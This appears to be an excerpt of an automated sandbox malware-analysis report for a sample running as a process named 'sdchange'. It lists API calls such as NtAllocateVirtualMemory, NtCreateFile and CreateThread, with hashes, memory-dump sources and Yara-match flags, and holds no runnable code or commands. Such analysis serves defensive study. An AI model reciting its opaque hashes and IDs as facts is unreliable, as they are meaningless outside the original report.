• Opcode Fuzzy Hash: 861e3b1bfda604aac3435d225d7b3c84582cee0418e2fa1f011e7b6222065e21
• Instruction Fuzzy Hash: 9B41E131740202ABC720CF2ACC41B6AB7A5FBA4755F10462EFD55EB761DB31E8468BD1

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
• Opcode ID: 668beb27cf55fd061ba03145bb6718f2c450fb942acca00be84e945fb2642748
• Instruction ID: 1a74f6beacafb2a4ceceb9b51eeb09fea572b3b54a610d5cf32c17e022442fe0
• Opcode Fuzzy Hash: 668beb27cf55fd061ba03145bb6718f2c450fb942acca00be84e945fb2642748
• Instruction Fuzzy Hash: 2E315772A00119AFDF60DE3DDC40FEF7BF8EB54610F44455AE949E3250EB709A458BA0

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-
                                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                      • Instruction ID: ca0aa5647f3562ae376bd7238e33250a16291b3a5f8b0be8323070905b6691c4
                                                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                      • Instruction Fuzzy Hash: D691C570E042369BDB24CF6DC891ABFBBA1AF64322F95451BE955E73E0D73089C18721
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$@
                                                                                                                      • API String ID: 0-1194432280
                                                                                                                      • Opcode ID: dddc6f0145fe4c0e6ccd5abab36da600661536835c26219a9d906b92f3cd8355
                                                                                                                      • Instruction ID: 6c4d236ee55dfcc3232aafd40b56e93a5c682e715b5c0407d8a43595434a24b4
                                                                                                                      • Opcode Fuzzy Hash: dddc6f0145fe4c0e6ccd5abab36da600661536835c26219a9d906b92f3cd8355
                                                                                                                      • Instruction Fuzzy Hash: 1D812A71D002699BDB31CB54DC44BEEB7B8AB08754F0041EAEA1DB7290D7709E84CFA0

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:2.6%
                                                                                                                      Dynamic/Decrypted Code Coverage:4.2%
                                                                                                                      Signature Coverage:1.6%
                                                                                                                      Total number of Nodes:450
                                                                                                                      Total number of Limit Nodes:76

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %$)S$7O$AvhU$Eh$K$LT$R.$Tz$U$^$b$h$hU$p$q$r$s$t${$m$u
                                                                                                                      • API String ID: 0-2504679547
                                                                                                                      • Opcode ID: a75e83c42f2f9fd67e807c0057357514b14d205e9f9892602770c764c1b19a40
                                                                                                                      • Instruction ID: 527b50b4838958ebc0119ba89d3e790705b2ebe98dca2616763d233477ffe2ad
                                                                                                                      • Opcode Fuzzy Hash: a75e83c42f2f9fd67e807c0057357514b14d205e9f9892602770c764c1b19a40
                                                                                                                      • Instruction Fuzzy Hash: 62F17BB0905269CBEB64CF45C8987DDBBB2BB45308F1085D9D60E7B281CBB95AC8CF45
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 0271C4A4
                                                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 0271C4DF
                                                                                                                      • FindClose.KERNELBASE(?), ref: 0271C4EA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3541575487-0
                                                                                                                      • Opcode ID: 680b19f4c8adf54fc6476685db503487a090742cea296c2ab8d9ab89c0d5ea54
                                                                                                                      • Instruction ID: cd47e5da3c482c860c40cd8e9ed9d9bbdf2a3bdc3469ec5109fcacbb0dd8751b
                                                                                                                      • Opcode Fuzzy Hash: 680b19f4c8adf54fc6476685db503487a090742cea296c2ab8d9ab89c0d5ea54
                                                                                                                      • Instruction Fuzzy Hash: 0F31A3B1940208BBDB22EBA4CC85FFF777CAF44748F14455DF948A6190D774AB848BA1
                                                                                                                      APIs
                                                                                                                      • NtCreateFile.NTDLL(?,?,?,?,3AF608A6,?,?,?,?,?,?), ref: 0272901B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 8371b61dc51180fe31843f5f92102e3747ac81664409a6ff066d1dcd20a62601
                                                                                                                      • Instruction ID: 8ba758b0fa8ec4e08ca83e27aea6963b1d9db71d361c8558a15a410805061494
                                                                                                                      • Opcode Fuzzy Hash: 8371b61dc51180fe31843f5f92102e3747ac81664409a6ff066d1dcd20a62601
                                                                                                                      • Instruction Fuzzy Hash: 6C31E4B5A01608AFCB14DF99C884EEEB7F9EF88304F108219F919A7240D730A905CFA4
APIs
• NtReadFile.NTDLL(?,?,?,?,3AF608A6,?,?,?,?), ref: 02729173
Memory Dump Source
• Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
• NtAllocateVirtualMemory.NTDLL(02711BCB,?,02727CEE,00000000,3AF608A6,00003000,?,?,?,?,?,02727CEE,02711BCB), ref: 02729458
Memory Dump Source
• Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
Yara matches
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
APIs
• NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02729254
Memory Dump Source
• Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
• Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
• Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
• Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
• Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
• Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
• Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
• Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
• Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
• Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 1cdf7c2631e8666ee862dfdb47f20df0f42146cea023818b670355cbc7bb95f2
• Instruction ID: 991ed83cefc7c219a67991a9f88b62c117df6e50df9909a81d1ed83cb2209798
• Opcode Fuzzy Hash: 1cdf7c2631e8666ee862dfdb47f20df0f42146cea023818b670355cbc7bb95f2
• Instruction Fuzzy Hash: E5900221243441527545B55D440451740469BE0245795C012A1415F50D9526E956E621
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 9c5c0dfbeee1c38b7749236fe5c8e1bb64f1d107e07b011e6eaa3d77947a33ba
                                                                                                                      • Instruction ID: 3e120660b28989cc6b593454cf7a7590b39492234e98268acd078c0481ac7b8b
                                                                                                                      • Opcode Fuzzy Hash: 9c5c0dfbeee1c38b7749236fe5c8e1bb64f1d107e07b011e6eaa3d77947a33ba
                                                                                                                      • Instruction Fuzzy Hash: 0B90026120280403F140795D480461700458BD0306F55C011A2065B55F9A29DD517135
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 1ae8a5022b46b30e3863043645f82520368269a85789e70295db84d7df7eb1a8
                                                                                                                      • Instruction ID: 65d12e4e9a700efe594d3e5ca51d93242ab08dbce22de810678b0625136dcb1a
                                                                                                                      • Opcode Fuzzy Hash: 1ae8a5022b46b30e3863043645f82520368269a85789e70295db84d7df7eb1a8
                                                                                                                      • Instruction Fuzzy Hash: B590022160240502F101755D4404626004A8BD0245F95C022A1025B55FDA25DA92B131
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: ccba94e0a4b1b7280b4d4aba45f1249ffda34f399aa59afcecd7eea3248a4565
                                                                                                                      • Instruction ID: d838230a6987de7d6b61f91a8fe6a7ab9c387ffbef38f5aa02417e9b20ad71b9
                                                                                                                      • Opcode Fuzzy Hash: ccba94e0a4b1b7280b4d4aba45f1249ffda34f399aa59afcecd7eea3248a4565
                                                                                                                      • Instruction Fuzzy Hash: 9590026134240442F100755D4414B160045CBE1305F55C015E1065B54E9619DD527126
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 707b8d38751db12413253fea9313438245e3be1d642580f11765a8ebbbe481f2
                                                                                                                      • Instruction ID: 4481b2b80996cb08b60574aa5271be454d10070cb898c1daf10be8dc2a4bcfb5
                                                                                                                      • Opcode Fuzzy Hash: 707b8d38751db12413253fea9313438245e3be1d642580f11765a8ebbbe481f2
                                                                                                                      • Instruction Fuzzy Hash: AF900221212C0042F200796D4C14B1700458BD0307F55C115A0155B54DD915D9616521
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: ed24f940c92ce1150c04fb9d864f389abbcb359fe92deafd6821f2cac14f7871
                                                                                                                      • Instruction ID: ecf2d608d838824dc7693cbe07630ee2ba7f06ff7869c168e45acb07b054f379
                                                                                                                      • Opcode Fuzzy Hash: ed24f940c92ce1150c04fb9d864f389abbcb359fe92deafd6821f2cac14f7871
                                                                                                                      • Instruction Fuzzy Hash: 70900221602400426140756D88449164045AFE1215755C121A0999B50E9559D9656665
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 3b09221996c5e14ee7cf7f96ff6539732d1d6823837d973c8baf4e85d3f18682
                                                                                                                      • Instruction ID: d22359483c52c72768390248b3339650c00f771037e01b08eaee728b409b9268
                                                                                                                      • Opcode Fuzzy Hash: 3b09221996c5e14ee7cf7f96ff6539732d1d6823837d973c8baf4e85d3f18682
                                                                                                                      • Instruction Fuzzy Hash: 7D900225222400022145B95D060451B04859BD6355395C015F1417B90DD621D9656321
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: d94077364ee8c9d9c4385e6f0050e68851ea7c7c949ca0616eb5258d0897a5c0
                                                                                                                      • Instruction ID: e2c74003d31722551dc5abf8f2c8295690a00b06fa7449f86babc030557127fb
                                                                                                                      • Opcode Fuzzy Hash: d94077364ee8c9d9c4385e6f0050e68851ea7c7c949ca0616eb5258d0897a5c0
                                                                                                                      • Instruction Fuzzy Hash: F5900225212400032105B95D070451700868BD5355355C021F1016B50DE621D9616121
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: d00acf28d589f4160ea3a80c136ab543d546a8d3db051fd1923e22d89f2ecb18
                                                                                                                      • Instruction ID: d19ba69b162314b4e0d637f335109f0d0b952ae921ac7c0741d5ca86ec6fe866
                                                                                                                      • Opcode Fuzzy Hash: d00acf28d589f4160ea3a80c136ab543d546a8d3db051fd1923e22d89f2ecb18
                                                                                                                      • Instruction Fuzzy Hash: 2B900261203400036105755D4414626404A8BE0205B55C021E1015B90ED525D9917125
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 84239d649f32a0369fac178824f68fa265fdd8ac08c39c7f2ff99c570b2ed355
                                                                                                                      • Instruction ID: 9fd816d2393014ab867e01ad2491b1914ea438343d3f14596c459604210e6581
                                                                                                                      • Opcode Fuzzy Hash: 84239d649f32a0369fac178824f68fa265fdd8ac08c39c7f2ff99c570b2ed355
                                                                                                                      • Instruction Fuzzy Hash: 1490023120644842F140755D4404A5600558BD0309F55C011A0065B94EA625DE55B661
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 54919beacc7e6312093b782a18f5302a9878f787c98cd6aae0d654ae3f07a5d3
                                                                                                                      • Instruction ID: 7e6f2e592ff175969c43faef4bd976505a11e58ba64c6689c5c67b7686276baf
                                                                                                                      • Opcode Fuzzy Hash: 54919beacc7e6312093b782a18f5302a9878f787c98cd6aae0d654ae3f07a5d3
                                                                                                                      • Instruction Fuzzy Hash: ED90023120240802F180755D440465A00458BD1305F95C015A0026B54EDA15DB5977A1
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
• Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
• Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
• Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

Control-flow Graph
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02709E05
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
Yara matches
Similarity
• API ID: CreateThread
